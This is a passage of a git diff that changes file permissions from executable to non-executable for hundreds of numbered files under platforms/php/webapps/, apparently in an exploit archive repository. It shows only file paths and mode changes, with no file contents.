b/platforms/php/webapps/6114.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6115.txt b/platforms/php/webapps/6115.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6117.txt b/platforms/php/webapps/6117.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6125.txt b/platforms/php/webapps/6125.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6126.txt b/platforms/php/webapps/6126.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6127.htm b/platforms/php/webapps/6127.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6128.txt b/platforms/php/webapps/6128.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6131.txt b/platforms/php/webapps/6131.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6132.txt b/platforms/php/webapps/6132.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6133.txt b/platforms/php/webapps/6133.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6134.txt b/platforms/php/webapps/6134.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6136.txt b/platforms/php/webapps/6136.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6137.txt b/platforms/php/webapps/6137.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6138.txt b/platforms/php/webapps/6138.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6139.txt b/platforms/php/webapps/6139.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6140.txt b/platforms/php/webapps/6140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6141.txt b/platforms/php/webapps/6141.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6142.txt b/platforms/php/webapps/6142.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6143.txt b/platforms/php/webapps/6143.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6144.txt b/platforms/php/webapps/6144.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6145.txt b/platforms/php/webapps/6145.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6146.txt b/platforms/php/webapps/6146.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6147.txt b/platforms/php/webapps/6147.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6148.txt b/platforms/php/webapps/6148.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6149.txt b/platforms/php/webapps/6149.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6150.txt b/platforms/php/webapps/6150.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6153.txt b/platforms/php/webapps/6153.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6154.txt b/platforms/php/webapps/6154.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6156.txt b/platforms/php/webapps/6156.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6159.txt b/platforms/php/webapps/6159.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6160.txt b/platforms/php/webapps/6160.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6161.txt b/platforms/php/webapps/6161.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6162.txt b/platforms/php/webapps/6162.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6163.txt b/platforms/php/webapps/6163.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6164.txt b/platforms/php/webapps/6164.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6165.txt b/platforms/php/webapps/6165.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6166.php b/platforms/php/webapps/6166.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6167.txt b/platforms/php/webapps/6167.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6168.php b/platforms/php/webapps/6168.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6169.txt b/platforms/php/webapps/6169.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6170.txt b/platforms/php/webapps/6170.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6173.txt b/platforms/php/webapps/6173.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6176.txt b/platforms/php/webapps/6176.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6177.php b/platforms/php/webapps/6177.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6178.php b/platforms/php/webapps/6178.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6179.txt b/platforms/php/webapps/6179.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6180.txt b/platforms/php/webapps/6180.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6182.txt b/platforms/php/webapps/6182.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6183.txt b/platforms/php/webapps/6183.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6184.txt b/platforms/php/webapps/6184.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6185.txt b/platforms/php/webapps/6185.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6186.txt b/platforms/php/webapps/6186.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6187.txt b/platforms/php/webapps/6187.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6189.txt b/platforms/php/webapps/6189.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6190.txt b/platforms/php/webapps/6190.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6191.txt b/platforms/php/webapps/6191.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6192.txt b/platforms/php/webapps/6192.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6193.txt b/platforms/php/webapps/6193.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6200.txt b/platforms/php/webapps/6200.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6203.txt b/platforms/php/webapps/6203.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6204.txt b/platforms/php/webapps/6204.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6205.txt b/platforms/php/webapps/6205.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6206.txt b/platforms/php/webapps/6206.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6207.txt b/platforms/php/webapps/6207.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6208.txt b/platforms/php/webapps/6208.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6211.txt b/platforms/php/webapps/6211.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6213.txt b/platforms/php/webapps/6213.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6214.php b/platforms/php/webapps/6214.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6215.txt b/platforms/php/webapps/6215.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6219.txt b/platforms/php/webapps/6219.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6221.txt b/platforms/php/webapps/6221.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6223.php b/platforms/php/webapps/6223.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6224.txt b/platforms/php/webapps/6224.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6225.txt b/platforms/php/webapps/6225.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6226.txt b/platforms/php/webapps/6226.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6228.txt b/platforms/php/webapps/6228.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6230.txt b/platforms/php/webapps/6230.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6231.txt b/platforms/php/webapps/6231.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6232.txt b/platforms/php/webapps/6232.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6233.txt b/platforms/php/webapps/6233.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6234.txt b/platforms/php/webapps/6234.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6235.txt b/platforms/php/webapps/6235.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6247.txt b/platforms/php/webapps/6247.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6249.txt b/platforms/php/webapps/6249.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6250.txt b/platforms/php/webapps/6250.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6254.txt b/platforms/php/webapps/6254.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6255.txt b/platforms/php/webapps/6255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6258.txt b/platforms/php/webapps/6258.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6259.txt b/platforms/php/webapps/6259.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6260.txt b/platforms/php/webapps/6260.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6261.txt b/platforms/php/webapps/6261.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6270.txt b/platforms/php/webapps/6270.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6271.txt b/platforms/php/webapps/6271.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6273.txt b/platforms/php/webapps/6273.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6276.txt b/platforms/php/webapps/6276.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6277.txt b/platforms/php/webapps/6277.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6280.txt b/platforms/php/webapps/6280.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6284.txt b/platforms/php/webapps/6284.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6285.txt b/platforms/php/webapps/6285.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6286.txt b/platforms/php/webapps/6286.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6287.txt b/platforms/php/webapps/6287.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6288.txt b/platforms/php/webapps/6288.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6291.txt b/platforms/php/webapps/6291.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6292.txt b/platforms/php/webapps/6292.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6294.txt b/platforms/php/webapps/6294.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6295.txt b/platforms/php/webapps/6295.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6296.txt b/platforms/php/webapps/6296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6297.txt b/platforms/php/webapps/6297.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6298.txt b/platforms/php/webapps/6298.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6300.txt b/platforms/php/webapps/6300.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6301.txt b/platforms/php/webapps/6301.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6303.txt b/platforms/php/webapps/6303.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6307.txt b/platforms/php/webapps/6307.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6309.txt b/platforms/php/webapps/6309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/631.txt b/platforms/php/webapps/631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6310.txt b/platforms/php/webapps/6310.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6311.php b/platforms/php/webapps/6311.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6312.txt b/platforms/php/webapps/6312.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6313.txt b/platforms/php/webapps/6313.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6314.txt b/platforms/php/webapps/6314.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6315.txt b/platforms/php/webapps/6315.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6316.php b/platforms/php/webapps/6316.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6320.txt b/platforms/php/webapps/6320.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6321.txt b/platforms/php/webapps/6321.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6325.php b/platforms/php/webapps/6325.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6332.txt b/platforms/php/webapps/6332.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6335.txt b/platforms/php/webapps/6335.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6336.txt b/platforms/php/webapps/6336.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6338.txt b/platforms/php/webapps/6338.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6339.txt b/platforms/php/webapps/6339.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6341.txt b/platforms/php/webapps/6341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6342.txt b/platforms/php/webapps/6342.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6343.txt b/platforms/php/webapps/6343.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6344.php b/platforms/php/webapps/6344.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6347.txt b/platforms/php/webapps/6347.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6348.txt b/platforms/php/webapps/6348.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6349.txt b/platforms/php/webapps/6349.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/635.txt b/platforms/php/webapps/635.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6350.txt b/platforms/php/webapps/6350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6351.txt b/platforms/php/webapps/6351.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6352.txt b/platforms/php/webapps/6352.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6354.txt b/platforms/php/webapps/6354.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6356.php b/platforms/php/webapps/6356.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6357.txt b/platforms/php/webapps/6357.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6360.txt b/platforms/php/webapps/6360.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6361.txt b/platforms/php/webapps/6361.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6362.txt b/platforms/php/webapps/6362.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6363.txt b/platforms/php/webapps/6363.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6364.txt b/platforms/php/webapps/6364.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6368.php b/platforms/php/webapps/6368.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6371.txt b/platforms/php/webapps/6371.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6373.txt b/platforms/php/webapps/6373.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6374.txt b/platforms/php/webapps/6374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6375.txt b/platforms/php/webapps/6375.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6376.txt b/platforms/php/webapps/6376.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6378.txt b/platforms/php/webapps/6378.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6379.txt b/platforms/php/webapps/6379.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6380.txt b/platforms/php/webapps/6380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6381.txt b/platforms/php/webapps/6381.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6382.txt b/platforms/php/webapps/6382.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6383.txt b/platforms/php/webapps/6383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6385.txt b/platforms/php/webapps/6385.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6388.txt b/platforms/php/webapps/6388.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6390.txt b/platforms/php/webapps/6390.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6392.php b/platforms/php/webapps/6392.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6395.txt b/platforms/php/webapps/6395.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6396.txt b/platforms/php/webapps/6396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6397.txt b/platforms/php/webapps/6397.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6398.txt b/platforms/php/webapps/6398.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6401.txt b/platforms/php/webapps/6401.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6402.txt b/platforms/php/webapps/6402.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6403.txt b/platforms/php/webapps/6403.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6404.txt b/platforms/php/webapps/6404.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6406.txt b/platforms/php/webapps/6406.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6408.txt b/platforms/php/webapps/6408.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6409.txt b/platforms/php/webapps/6409.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6410.txt b/platforms/php/webapps/6410.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6411.txt b/platforms/php/webapps/6411.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6412.txt b/platforms/php/webapps/6412.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6413.txt b/platforms/php/webapps/6413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6416.txt b/platforms/php/webapps/6416.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6417.txt b/platforms/php/webapps/6417.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6419.txt b/platforms/php/webapps/6419.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6421.php b/platforms/php/webapps/6421.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6422.txt b/platforms/php/webapps/6422.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6423.txt b/platforms/php/webapps/6423.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6425.txt b/platforms/php/webapps/6425.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6426.txt b/platforms/php/webapps/6426.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6427.txt b/platforms/php/webapps/6427.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6430.txt b/platforms/php/webapps/6430.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6433.txt b/platforms/php/webapps/6433.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6435.txt b/platforms/php/webapps/6435.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6436.txt b/platforms/php/webapps/6436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6437.txt b/platforms/php/webapps/6437.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6439.txt b/platforms/php/webapps/6439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6442.txt b/platforms/php/webapps/6442.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6444.txt b/platforms/php/webapps/6444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6445.txt b/platforms/php/webapps/6445.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6446.txt b/platforms/php/webapps/6446.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6447.txt b/platforms/php/webapps/6447.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6448.txt b/platforms/php/webapps/6448.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6449.php b/platforms/php/webapps/6449.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6451.txt b/platforms/php/webapps/6451.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6452.txt b/platforms/php/webapps/6452.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6455.txt b/platforms/php/webapps/6455.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6456.txt b/platforms/php/webapps/6456.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6457.txt b/platforms/php/webapps/6457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6460.txt b/platforms/php/webapps/6460.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6461.txt b/platforms/php/webapps/6461.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6464.txt b/platforms/php/webapps/6464.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6465.txt b/platforms/php/webapps/6465.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6466.txt b/platforms/php/webapps/6466.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6467.txt b/platforms/php/webapps/6467.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6468.txt b/platforms/php/webapps/6468.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6469.txt b/platforms/php/webapps/6469.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6473.txt b/platforms/php/webapps/6473.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6475.txt b/platforms/php/webapps/6475.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6478.txt b/platforms/php/webapps/6478.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6480.txt b/platforms/php/webapps/6480.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6482.txt b/platforms/php/webapps/6482.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6483.txt b/platforms/php/webapps/6483.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6485.txt b/platforms/php/webapps/6485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6486.txt b/platforms/php/webapps/6486.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6487.txt b/platforms/php/webapps/6487.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6488.txt b/platforms/php/webapps/6488.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6489.txt b/platforms/php/webapps/6489.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6490.txt b/platforms/php/webapps/6490.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6492.php b/platforms/php/webapps/6492.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6494.txt b/platforms/php/webapps/6494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6495.txt b/platforms/php/webapps/6495.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6499.txt b/platforms/php/webapps/6499.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6500.txt b/platforms/php/webapps/6500.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6501.txt b/platforms/php/webapps/6501.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6502.txt b/platforms/php/webapps/6502.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6503.txt b/platforms/php/webapps/6503.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6504.txt b/platforms/php/webapps/6504.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6505.txt b/platforms/php/webapps/6505.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6507.php b/platforms/php/webapps/6507.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6508.txt b/platforms/php/webapps/6508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6510.txt b/platforms/php/webapps/6510.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6511.txt b/platforms/php/webapps/6511.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6512.txt b/platforms/php/webapps/6512.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6513.txt b/platforms/php/webapps/6513.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6514.txt b/platforms/php/webapps/6514.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6516.txt b/platforms/php/webapps/6516.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6517.txt b/platforms/php/webapps/6517.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6518.txt b/platforms/php/webapps/6518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6519.php b/platforms/php/webapps/6519.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6520.txt b/platforms/php/webapps/6520.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6521.txt b/platforms/php/webapps/6521.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6522.txt b/platforms/php/webapps/6522.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6523.php b/platforms/php/webapps/6523.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6524.txt b/platforms/php/webapps/6524.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6525.txt b/platforms/php/webapps/6525.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6526.txt b/platforms/php/webapps/6526.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6527.txt b/platforms/php/webapps/6527.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6528.txt b/platforms/php/webapps/6528.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6529.php b/platforms/php/webapps/6529.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6530.txt b/platforms/php/webapps/6530.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6531.txt b/platforms/php/webapps/6531.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6533.txt b/platforms/php/webapps/6533.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6535.txt b/platforms/php/webapps/6535.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6538.txt b/platforms/php/webapps/6538.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6539.txt b/platforms/php/webapps/6539.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6541.txt b/platforms/php/webapps/6541.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6542.txt b/platforms/php/webapps/6542.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6543.txt b/platforms/php/webapps/6543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6544.txt b/platforms/php/webapps/6544.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6545.txt b/platforms/php/webapps/6545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6547.txt b/platforms/php/webapps/6547.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6549.txt b/platforms/php/webapps/6549.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6550.txt b/platforms/php/webapps/6550.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6551.txt b/platforms/php/webapps/6551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6552.txt b/platforms/php/webapps/6552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6553.txt b/platforms/php/webapps/6553.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6555.txt b/platforms/php/webapps/6555.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6556.txt b/platforms/php/webapps/6556.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6557.txt b/platforms/php/webapps/6557.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6558.txt b/platforms/php/webapps/6558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6559.txt b/platforms/php/webapps/6559.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6561.txt b/platforms/php/webapps/6561.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6562.txt b/platforms/php/webapps/6562.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6563.txt b/platforms/php/webapps/6563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6564.txt b/platforms/php/webapps/6564.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6566.txt b/platforms/php/webapps/6566.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6568.txt b/platforms/php/webapps/6568.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6569.txt b/platforms/php/webapps/6569.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6571.txt b/platforms/php/webapps/6571.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6572.txt b/platforms/php/webapps/6572.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6574.php b/platforms/php/webapps/6574.php 